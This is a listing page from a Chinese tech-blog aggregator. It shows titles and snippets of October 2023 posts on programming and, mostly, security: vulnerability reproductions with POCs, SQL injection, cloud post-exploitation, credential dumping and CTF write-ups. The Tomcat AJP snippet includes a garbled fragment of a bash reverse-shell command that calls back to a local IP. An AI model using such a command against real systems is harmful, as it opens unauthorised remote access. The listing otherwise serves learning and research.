0x01

Apache Solr RemoteStreaming 文件读取与SSRF漏洞

用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过HttpGet操作提出查找请求,并得到XML格式的返回结果.0x01漏洞概述ApacheSolr是一个开源的搜索服务器
5f4120c4213b·2023-10-29 22:15

CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现

目录0x01声明:0x02简介:0x03漏洞概述:0x04影响版本:0x05环境搭建:下载环境:(要注册账号)登录页面:0x06漏洞复现:EXP地址:修改EXP:利用EXP:0x07流量分析:说明:特征一
Evan Kang·2023-10-29 22:07

【C++】C++11枚举类型enum class

文章目录0x00前言0x01枚举类型定义0x02限定作用域enumclass使用1.限定作用域enumclass定义2.举例0x03enumclass与enum区别1.避免枚举成员重定义2.避免隐式转换
wangqingchuan92·2023-10-29 19:19

未授权漏洞

目录0x01、什么是未授权漏洞0x02、SpringBootActuator未授权访问0x03SwaggerUI未授权访问漏洞0x01、什么是未授权漏洞未授权访问漏洞可以理解为需要安全配置或权限认证的地址
白帽小伞·2023-10-29 16:13

字节-位-16进制-高位在前-字母-中文

一个标点占一个字节2.中文一个文字占2字节,一个标点占三字节3.1字节=8位,1024字节=1K,1024k=1M4.16进制一般以0x开头,每个16进制位占0.5个字节;0x00表示1个字节,10进制表示0;0x01
m0_37188294·2023-10-29 11:24

[源码解析] 模型并行分布式训练 Megatron (3) ---模型并行实现

[源码解析]模型并行分布式训练Megatron(3)—模型并行实现文章目录[源码解析]模型并行分布式训练Megatron(3)---模型并行实现0x00摘要0x01并行Transformer层1.1初始化
罗西的思考·2023-10-29 08:45

云安全-云服务器(RAM)后渗透

当账户配备了ram账户,即给该账户赋予了对于云上服务器的一些管理权限,一是方便了用户管理,但另一方面当存在服务器失陷且存在RAM用户权限,可能对云上服务器资产造成很大的危害0x01元数据概念元数据包含了弹性计算云服务
告白热·2023-10-29 07:24

智能合约安全审计 | 整数溢出

智能合约安全审计|整数溢出0x01溢出攻击事件2018年4月22日,黑客对BEC智能合约发起攻击,凭空取出57,896,044,618,658,100,000,000,000,000,000,000,000,000,000,000,000,000,000,000.792003956564819968
零时科技·2023-10-29 06:19

[WooYun-2016-226888] SpringBoot框架SpEL漏洞复现与原理详细分析

文章目录0x01前言:0x02版本范围:0x03漏洞复现:0x04原理分析:1、前置知识:2、代码审计分析:3、总结:0x01前言:这是2016年爆出的一个洞,在CVE上没有找到对应编号,经过多方资料查阅最终确认是唐朝实验室在乌云上提交的该通用漏洞
m0rta1·2023-10-29 05:25

使用 IDEA 快速远程调试 Docker 中运行的 Java 应用程序 (附解决思考过程)

文章目录0x01前言:0x02解决思路:(有兴趣可了解)0x03具体操作:0x04提醒:0x01前言:最近在复现&分析Java领域历史相关漏洞,学习学习Java框架漏洞代码审计思路。
m0rta1·2023-10-29 05:55

安全漏洞XSS、CSRF、SQL注入以及DDOS攻击

0x01:XSS漏洞1、XSS简介跨站脚本(crosssitescript)简称为XSS,是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。
Qq1014136047·2023-10-29 04:23

腾讯2016实习招聘-安全岗笔试题答案详细解释

0x01开始2016年4月2日晚上7:00到9:00,腾讯2016实习招聘-安全技术的笔试题确实考到很多基础知识。该笔试题有两部分。
daxi0ng·2023-10-29 00:13

AI for Security:智能化安全对抗的困境

0x01背景本段将由大到小从国家、网上公开资料、项目三个方面说明智能化安全对抗时代的来临。正如有时候觉得学得好不如嫁得好,在网络安全方面有时也是学得好不如运气好跟上了历史的进程。
三更两点·2023-10-28 21:03

python中argparse命令行参数解析工具

importargparseparser=argparse.ArgumentParser(description="usedfortest")args=parser.parse_args()'''运行尝试下测试界面#0x01
七分醉意情·2023-10-28 18:01

一次运气很好的文件上传

0x01站点1:文件上传发现源代码泄露打开自己珍藏已久的辣鸡字典,扫描发现存在bin.zip信息泄露,尝试进行代码审计文件位置:SimpleDataPlatform.SimpleDataPlatform.fileUpload
渗透测试中心·2023-10-28 15:10

iOS Xcode15 适配:Other Linker Flags:-ld_classic

0x00适配是一条没有尽头的路Xcode14毛问题都没有,Xcode15崩溃看图说话0x01解决方案OtherLinkerFlags添加-ld_classic即可0x02我的小作品欢迎体验我的作品之一:
豪冷啊·2023-10-28 15:03

iOS UIAlertController 添加自定义视图

0x00效果图先看效果图~1.展示图片的2.展示自定义视图的0x01分类想要添加视图,就要有足够的空间如何让系统给出足够的空间呢?
豪冷啊·2023-10-28 15:33

CVE-2022-25237 Bonitasoft Platform RCE漏洞复现

目录0x01声明:0x02简介:0x03漏洞概述:0x04影响版本:Forcommunity(社区版):Forsubscription(订阅版):0x05环境搭建:Vulfocus环境搭建:漏洞环境搭建
Evan Kang·2023-10-28 11:26

CVE-2020-1938 Tomcat AJP漏洞复现

0x01漏洞影响ApacheTomcat9.x&/dev/tcp/10.0.2.15/88880>&1为了能正常执行需要对命令进行编码并组装成bash,推荐在线bashpayload生成。
半夜菊花茶·2023-10-28 10:47

[源码解析] 当 Java Stream 遇见 Flink

[源码解析]当JavaStream遇见Flink文章目录[源码解析]当JavaStream遇见Flink0x00摘要0x01领域1.1Flink1.2JavaStream1.3探寻角度0x02数据流模型
罗西的思考·2023-10-28 09:26

ATT&CK-T1003-004-操作系统凭据转储:LSA 机密

0x01基础信息具体信息详情ATT&CK编号T1003-004所属战术阶段凭据访问操作系统windows7旗舰版SP1创建时间2022年12月2日监测平台火绒安全、火绒剑、sysmon0X02技术原理对主机具有
Sword-heart·2023-10-28 05:04

Mac 搜狗输入法文本替换同步到手机

电脑录入好文本替换内容在搜狗输入法Mac版,可以导入文本替换的配置文件,这个自行查看吧,后缀是.ini的文件有了这个文件Mac上就可以用搜狗输入法的文本替换了**PS:**搜狗叫做自定义短语,配置文件可以先导出然后在编辑,编辑后导入0x01
游城十代2dai·2023-10-28 05:39

Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)

0x01产品简介ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS)API。
OidBoy_G·2023-10-28 05:08

Swift 蓝牙十六进制指令的发送与接收

1、指令的发送初始化待发送的指令数据letbytes:[UInt8]=[0x01,0x02,0x03,0x04,0x05]将字节数组转化为Data数据letbyteData:Data=Data.init
henu_Larva·2023-10-28 04:49

Linux进程控制

一、进程终止0x01进程退出场景①代码运行完毕,结果正确,退出码为0②代码运行完毕,结果不正确,退出码!
@@永恒·2023-10-28 03:01

[业界方案]用Jaeger来学习分布式追踪系统Opentracing

[业界方案]用Jaeger来学习分布式追踪系统Opentracing文章目录[业界方案]用Jaeger来学习分布式追踪系统Opentracing0x00摘要0x01缘由&问题1.1选择Jaeger1.2
罗西的思考·2023-10-27 22:32

从效率角度分析Java的GC策略

0x01回收工作的开展我们知道,只有没有被引用指向的对象才会被回收。那怎么判断没有被引用指向?
DrunkPian0·2023-10-27 19:24

内网安全-域环境&工作组&局域网探针方案

目录(一)前置知识0x01DMZ区0x02工作组VS域环境0x03域控制器DC0x04AD(活动目录)0x05linux域渗透问题0x06局域网技术适用问题0x07大概内网安全流程问题(二)案例演示0x01
@Camelus·2023-10-27 13:12

服务器中间件版本信息泄露,中间件版本信息泄露漏洞

0x01中间件版本信息泄露漏洞-风险等级低0x02中间件版本信息泄露漏洞-原理由
胡子长过汪涵·2023-10-27 13:01

influxdb未授权访问漏洞

influxdb未授权访问漏洞byADummy0x00利用路线Influxdbhttpquery接口—>生成jwt凭证绕过认证—>任意sql语句执行0x01漏洞介绍InfluxDB是一个使用Go语言编写的开源分布式
ADummy_·2023-10-27 11:16

Pikachu靶场通关实录-暴力破解篇

0x01简介“暴力破解”是一种攻击手段。在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。
Asson·2023-10-27 01:03

Python字典-dict “ “ ---记一次查缺补漏“ “

文章目录0x0前言0x1字典(Dictionary)0x01访问字典里的值0x02修改字典0x03删除字典元素0x04判断字典是否包含指定key,用in或notin运算符0x2字典键的特性0x010x20x3
Sciurdae·2023-10-27 00:59

CTF-Crypto学习记录-第三天 MD5加密算法(信息摘要算法)“ “

文章目录0x1MD5基本介绍0x2MD5加密特点0x3MD5加密原理步骤0x01对明文数据进行信息填充0x02设置初始变量0x03加密运算过程加密运算流程图:四个非线性函数:Mj表示消息的第j个子分组(
Sciurdae·2023-10-27 00:28

rpc入门笔记0x01

syntax="proto3";//这是个proto3的文件messageHelloRequest{//创建数据对象stringname=1;//name表示名称,编号是1}生成python文件安装grpcio和grpcio-tools库pipinstallgrpcio#安装grpcpipinstallgrpcio-tools#安装grpctools生成proto的python文件python-m
INGg__·2023-10-27 00:18

泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

0x01产品简介泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台
OidBoy_G·2023-10-26 22:13

六零导航页SQL注入漏洞复现(CVE-2023-45951)

0x01产品简介LyLmeSpage(六零导航页)是中国六零(LyLme)开源的一个导航页面。
OidBoy_G·2023-10-26 22:35

CVE-2022-22965 Spring Framework远程命令执行

0x01影响版本SpringFramework90x02复现环境vulhub/spring/cve-2022-229650x03漏洞复现首先docker-composeup-d开启靶场输入payloadGET
连人·2023-10-26 17:11

【Linux入侵排查知识总结】

0x01入侵排查思路一
samRsa·2023-10-26 14:09

IntelliJ IDEA Spark环境搭建

IntelliJIDEA,并激活安装Spark,JDK1.8(Spark2.4.3与jdk12版本有兼容问题,降级为jdk8版本可以解决),scala,sbt(一个类似于maven,npm等的scala版本的包管理工具)0x01
小道小姐姐·2023-10-26 12:38

Linux kernel特权提升漏洞复现(CVE-2021-3493)

0x01漏洞概述OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。
5f4120c4213b·2023-10-26 09:18

【moeCTF题解-0x01】Reverse

title:【moeCTF题解-0x01】Reversecategories:CTFmoeCTFtags:CTF【moeCTF题解-0x01】Reverse一个全新的领域【moeCTF题解】总目录如下:
框架主义者·2023-10-26 01:03

【moeCTF题解-0x00】序

这里的评论功能还没有建设好,可以先去那里~【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址)【moeCTF题解-0x00】序(包括Signin)【moeCTF题解-0x01】Reverse
框架主义者·2023-10-26 01:33

蓝凌EIS智慧协同平台saveImg接口任意文件上传漏洞复现 [附POC]

文章目录蓝凌EIS智慧协同平台saveImg接口任意文件上传漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06
gaynell·2023-10-25 21:19

安美数字酒店宽带运营系统SQL注入漏洞复现 [附POC]

文章目录安美数字酒店宽带运营系统SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现安美数字酒店宽带运营系统SQL
gaynell·2023-10-25 21:18

CNVD-2021-26422:亿邮电子邮件系统moni_detail.do远程命令执行漏洞复现 [附POC]

文章目录亿邮电子邮件系统moni_detail.do远程命令执行CNVD-2021-26422漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境
gaynell·2023-10-25 21:48

鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]

文章目录鸿运主动安全监控云平台任意文件下载漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现鸿运主动安全监控云平台任意文件下载漏洞复现
gaynell·2023-10-25 21:33

IDA python(简单)

文章目录0x01简介0x02使用方法0x03相关语法0x01简介IDApython是一个IDA的插件,其功能作用和IDC差不多,但IDC功能并没有IDApython强大。
lllle00·2023-10-25 20:59

PostgreSQL开发规范

PostgreSQL开发规范0x00背景0x01命名规范0x02设计规范0x03索引规范0x04查询规范0x05管理规范0x00背景没有规矩,不成方圆。
灿彬垂死挣扎ing·2023-10-25 18:57

记一次内网实战之不会免杀(下)

本文作者:重生信安-鲨鱼0x01前言前几天忙的一批,也是没法再写文章,工作中黑盒测试也遇到很有意思的渗透故事,但鉴于保密问题也没法向大家公开。
重生信息安全·2023-10-25 08:05

代码审计|基于某Java开源系统的代码审计

0x01基础环境1.1技术框架核心框架:SpringBoot2.0.0持久层框架:Mybatis1.3.2日志管理:Log4j2.10.0前端框架:Vue2.6.10UI框架:Ant-Design-Vue1
灼剑(Tsojan)安全团队·2023-10-25 05:02
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他